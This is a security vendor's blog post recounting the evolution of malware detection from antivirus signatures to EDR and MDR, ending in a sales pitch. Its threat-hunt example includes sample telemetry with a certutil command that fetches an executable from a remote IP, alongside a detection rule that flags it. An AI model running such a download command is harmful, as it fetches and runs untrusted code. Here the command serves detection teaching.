MDR: An Origin Story

Written by Sean Hittel | Jul 12, 2022

A hero's origin story usually accounts for the source of two things: their power and their motivation. Often, the audience is already familiar with the hero's current state; what is interesting about these stories is the context from the backstory, and how it enables a great advantage in the present, where the challenges the hero faces are even more extreme. This story, about Managed Detection and Response (MDR), is no exception.

Read on for an insider look at MDR, followed by a harrowing tale of how we got here over the last 25 years. My primary focus will be on the technological and tactical advances that gave MDR the capabilities it has today - because the motivation, to anybody who has read any recent news about ransomware and other advanced persistent threats (APTs), is obvious.

The Managed Detection and Response (MDR) space is characterized by expert use of detection and response technologies on the endpoint (EDR), on the network (NDR), and in the cloud. MDR done right involves teams of security engineers, developers, threat hunters, and data scientists processing huge volumes of event data to find and anticipate today's financially-motivated attackers. It also involves distilling this expert analysis into action that is digestible even by resource-constrained administrators.

From a technical perspective, in its current form, MDR is a response to attackers using techniques such as Living Off the Land (LOtL) and human-at-keyboard attacks to make automated detection difficult. From a market standpoint, MDR is an evolution that provides organizations that cannot stand up teams of specialists themselves (whether due to capacity or expertise) with the skill sets needed to wield the advanced tools required to combat today's threats - just as the hero defends those who cannot defend themselves. How did we get to such a complex battlefield that requires such a complex solution?

The Attacker-Defender Coevolution

I’ve been fortunate enough to have been employed in the computer security field since the late 90s. It has long been both a hobby and a career. Something about the attacker-defender coevolution keeps my interest piqued. While a lot has changed over that time, the technical battle, and its resulting solutions’ confrontation with the marketplace, have not. Often one detection technology begets a new attack paradigm, whose solution creates a new product in the marketplace, whose adoption drives a new technique, tactic or procedure. Such iteration makes cybersecurity an exciting field in terms of attack evolution, technology co-evolution, and marketplace readiness.

When I first started using ML in security in the late 90s, we mostly called it statistics, or anomaly detection. Though the techniques were largely the same, by 2012 we had vendors simply stating they used ML as their value proposition. By about 2015, vendors at RSA were basically standing on their tables and yelling "we have more machine learning" at passersby. Shortly thereafter, proving the value of ML became more complex, with customers demanding more from each solution.

This attacker-defender coevolution can be seen in cases like ransomware’s use of blockchain. Ransomware attackers have existed since as early as 1989, but they didn’t really have the level of impact they do today until they could be paired with the decentralized and confidential nature of the blockchain. Similarly, the human-plus-detection-engine symbiosis coevolved with the attackers. As attackers learned strategic ways of evading detection engines and their human analysts, the defensive stack improved its efficacy to keep up with the new threats.

The Year of the Virus: The Shift from Static to Dynamic Attacks

Prior to about 2001, malware was largely a static binary. Authors would compile once, and that version of the virus would remain constant until the next compile. One static file. One static detection. There were certainly techniques such as polymorphism talked about among attackers, but they were largely theoretical and weren’t huge issues for defenders. By about mid-2001, however, malware authors understood they could evade the signature- and heuristic-based, state-of-the-art AV systems of the day using polymorphism, and deployed the technique frequently enough to cause major problems for AV vendors. Think of threat actors as “the bad guys” and traditional prevention technology vendors as “the police” in the context of our hero analogy. The hero evolves to suit a need that our everyday defenders can’t overcome.

Malware authors also discovered they could worm their creations. This led to the famous Code Red, Nimda, and Klez worm families of the day. These news-grabbing worms spread across the internet extremely rapidly, saturating all vulnerable endpoints, keeping security response teams’ pagers buzzing, and keeping marketing departments on their toes to be sure the public understood the threats, and the defenders’ successes. This was an exciting time. The time from attack release, to a defender's first discovery, to the first blog about it was often measured in minutes.

At this time, a detection would look for a hash (a digital fingerprint of sorts), a specific set of fixed bytes, particular imports, or a file size range. Attackers were so far ahead of defender detection technology that AV vendors’ security response teams were logging enormous amounts of overtime to try to keep up. During this period, security teams were just treading water in a fast-moving river. Attackers were causing such problems for anti-virus (AV) engines that media outlets dubbed 2001 “The year of the virus.”
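To make that concrete, here is a minimal sketch of what such a static check might have looked like. It is illustrative only: the hash, byte pattern, and size range are placeholders rather than real detections, and real engines combined many such indicators rather than relying on any one of them.

```python
import hashlib

# Placeholder indicators - illustrative only, not real detections.
KNOWN_BAD_SHA256 = {"replace-with-a-known-bad-sha256-hash"}
KNOWN_BAD_BYTES = [b"\xde\xad\xbe\xef\x13\x37"]   # a fixed byte sequence
SUSPECT_SIZE_RANGE = (40_000, 60_000)             # file size in bytes

def static_scan(path: str) -> bool:
    """Return True if the file matches any of these toy static indicators."""
    with open(path, "rb") as f:
        data = f.read()

    if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256:
        return True
    if any(pattern in data for pattern in KNOWN_BAD_BYTES):
        return True
    # Real engines would never convict on size alone; it was one weak signal
    # among several (imports, strings, section layout, and so on).
    if SUSPECT_SIZE_RANGE[0] <= len(data) <= SUSPECT_SIZE_RANGE[1]:
        return True
    return False
```

Polymorphism broke exactly this model: once every copy of the malware had a different hash and different bytes, fixed indicators like these matched nothing.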

From an economic standpoint, what polymorphism meant was that it was very cheap (automatic) for attackers to generate a new malware sample that was functionally identical to its predecessors but could easily evade signature- and heuristic-based AV. Attackers seemed to have every advantage. What worming meant was that the attacker didn’t have to take on any of the risk, or the cost, of distributing a new sample. The attack distributed itself.

The Machine-learning Reprise

The response to this was that AV vendors began investing in ML (or AI, depending on which marketing department one speaks with ;) ). They also began investing in behavioral protection - measuring what the attack does while executing (its behavior), not the components of the file at rest on disk. Though this behavioral detection was initially aimed at analyzing processes, the strategy itself led to fields including today’s User and Entity Behavior Analytics (UEBA).
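As a purely hypothetical illustration of the difference, a behavioral rule watches what a process does rather than what its file contains. The event fields and threshold below are invented for this sketch; they do not describe how any particular engine works.

```python
from collections import Counter

def looks_like_ransomware(process_events, rename_threshold=100):
    """Flag a process that mass-renames files to a single new extension -
    a behavior no static, at-rest file scan would ever see."""
    renames = Counter(
        e["new_ext"] for e in process_events if e["action"] == "file_rename"
    )
    return any(count >= rename_threshold for count in renames.values())

# Invented example events for one process.
events = [{"action": "file_rename", "new_ext": ".locked"} for _ in range(250)]
print(looks_like_ransomware(events))  # True
```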

By around 2006, AV vendors again had the upper hand. This was evident in organizational and conference hallways, where well-rested detection-engine engineers and security response folks held their heads high.

A malware-detection stack of the day would include ML algorithms like random forests that convicted files based on thousands of attributes of files at rest or processes at execution. Signature-based detections still existed, but they were often automatically generated - and these automatic signature generation systems often used ML extensively themselves.
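A minimal sketch of that idea, assuming scikit-learn and a made-up four-attribute feature set; production stacks convicted files on thousands of attributes and vastly larger training sets.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

# Toy feature vectors: [file_size_kb, num_imports, entropy, is_packed]
X_train = np.array([
    [120, 45, 5.1, 0],   # benign samples
    [340, 80, 4.8, 0],
    [ 60,  3, 7.9, 1],   # malicious samples
    [ 75,  5, 7.6, 1],
])
y_train = np.array([0, 0, 1, 1])  # 0 = benign, 1 = malicious

clf = RandomForestClassifier(n_estimators=100, random_state=0)
clf.fit(X_train, y_train)

# Score a new file's attributes and threshold on the predicted probability.
new_file = np.array([[68, 4, 7.8, 1]])
print(clf.predict_proba(new_file)[0, 1])  # estimated probability of "malicious"
```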

In our superhero analogy, machine learning algorithms are like Batman’s toolbelt. Selection of the right tool for the job is tremendously important, and it takes a skilled, practiced operator to use them effectively.

AV vendors spent much of the time between 2006 and 2012 growing their ML skills and adding more advanced ML/AI systems using algorithms like Support-Vector Machines (SVMs), regression, and clustering, as well as ensemble systems and deep learning. The scale of data processed also ballooned as data-hungry ML algorithms and efficacy teams sought ever more event telemetry to help predict what the next malware would look like.

I remember one hallway conversation where we realized that we had crossed the threshold of one uniquely behaving malware sample for each human. :0

Economic Advantage to Hackers

This was also the period when financially-motivated malware really took off. Browser exploitation systems, Business Email Compromise (BEC), and ransomware attackers were deeply invested in avoiding these advanced ML/AI systems.

Game on!

Among other things, attackers realized the cost to detection vendors of a false positive - for each false positive, the vendor would have to analyze the root cause deeply and explain it to their customer. This often happened while competing vendors’ solutions were being evaluated by the same prospective end user simultaneously. To make matters worse, attackers understood they could cause false positives cheaply.

Attackers would use packers that were also used in legitimate software to wrap their malware, and submit it broadly to malware sample intake systems. The detection creation processes would happily consume these files and release updated detections. The problem is, these updated detections would also false-positive on legitimate software and on pseudo-legitimate potentially unwanted applications (PUAs). Exactly as the attackers intended - to distract defenders and waste their resources. Remember, part of the hero’s job is to see past these red herrings to focus on the true threat.

Attackers learned they could use economic factors to push technology around, and AV vendors began letting attacks through as false negatives while still collecting all the detection telemetry needed to evaluate the attacks as log events. Economic factors won out, and attackers again had the advantage.

Productization of Event Telemetry and Log Saturation

With this large source of event logs, and demonstrable detection gaps well understood, astute marketeers saw the opportunity to expose these logs to the end user. This was the onset of the whole EDR space. The approach taken by EDR vendors is to provide the end user with raw event logs and let them deal with the false positives and the false negatives through analysis of this event data. To maximize effectiveness, EDR customers have to regularly update their threat hunt queries to find recent evasive threats, and further refine those queries against ever-evolving software configurations to address each emergent threat. Note that this makes big assumptions about defender organizations having (A) the people (B) with the right skills to operate the technology at scale.
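To give a flavor of what such a hunt involves, here is a deliberately simplified sketch in Python rather than any vendor’s query language. The event fields are invented; the pattern it looks for - certutil being abused as a downloader - is a classic Living Off the Land example, but the rule itself is illustrative, not a production detection.

```python
# Hypothetical endpoint telemetry; field names are invented for this sketch.
events = [
    {"host": "wks-012", "process": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/a.exe a.exe"},
    {"host": "wks-044", "process": "certutil.exe",
     "cmdline": "certutil.exe -hashfile installer.msi SHA256"},
]

def hunt_certutil_downloads(events):
    """Flag certutil being used to fetch a remote file - a LOtL downloader pattern."""
    return [
        e for e in events
        if e["process"].lower() == "certutil.exe"
        and "-urlcache" in e["cmdline"].lower()
    ]

for hit in hunt_certutil_downloads(events):
    print(hit["host"], hit["cmdline"])   # every hit still needs human triage
```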

Then they would have to analyze the results of all these threat hunt queries. There can be hundreds or even thousands of log lines returned from each of these queries. The security analyst, suffering from alert fatigue, is faced with a decision to either ignore the events returned from the query or sift through them. Since we are looking for rare attack events in seas of non-attack events, the security analyst is often incentivized to ignore these events and move on to other, more productive tasks. While this is fine in most cases - when no attack is present - it also lets real attacks through, with the end result that the EDR does little to close the known evasion hole that attackers were able to walk through with AV systems.

EDR was Not a Panacea

Though it isn’t perfect, this concept of offloading detection and refinement to end users via EDR solutions can work, so long as there is a qualified team running the EDR solution with the time, skills, and aptitude necessary to deeply leverage its power, as well as to configure and maintain it. And the spend to handle the log volume!

To further compound the problem, EDRs are high maintenance: high maintenance to build, high maintenance to deploy, and high maintenance to investigate threats well.

To make matters worse, today’s attackers are well versed in evading nearly anything but the most diligently managed EDRs. They have long used techniques like Living Off the Land (LOtL), noise generators, dual-use technology, and human-at-keyboard active attacks to work around the very defenses EDR-based solutions are meant to provide.

Though these high-maintenance systems might be well suited for organizations with large security teams, what should those with smaller security teams do?

Going on the Offensive: MDR / XDR

Enter the next evolution in the attacker vs. defender saga: MDR - Managed Detection and Response. Though it is possible to stand up the necessary teams to tune EDRs, to analyze the large quantities of data they produce looking for tiny attack needles in normal event haystacks, and to understand each attacker evolution, this is well beyond the abilities of all but the most well-resourced organizations.

ActZero believes that in most cases, it is better to have experts managing EDR solutions as part of an MDR service, letting customers focus on their business rather than on maintaining a complex set of tools. We do this via expert tuning of tools like EDRs, deep data science and machine learning, end-to-end efficacy evaluations, and emergent-threat handling - bringing the necessary security suite so organizations can do what they do best in their domain.

Ultimately, the hero is judged by their actions, not their words. Given the context described above, you may have some pretty lofty expectations about MDR right now - and you may be skeptical as to whether they are reachable. That is why we offer a Ransomware Readiness Assessment - at no cost to you - in which we test your security stack (and ours) against some particularly nasty, DarkWeb-sourced APTs. We evaluate block rate, dwell time, and signal-to-noise ratio across both solutions, and ultimately whether or not they stopped the objectives of the attacker campaign on your in-production endpoint (without any risk of disruption). Sign up for an assessment today to see how we have enabled a heroic advantage.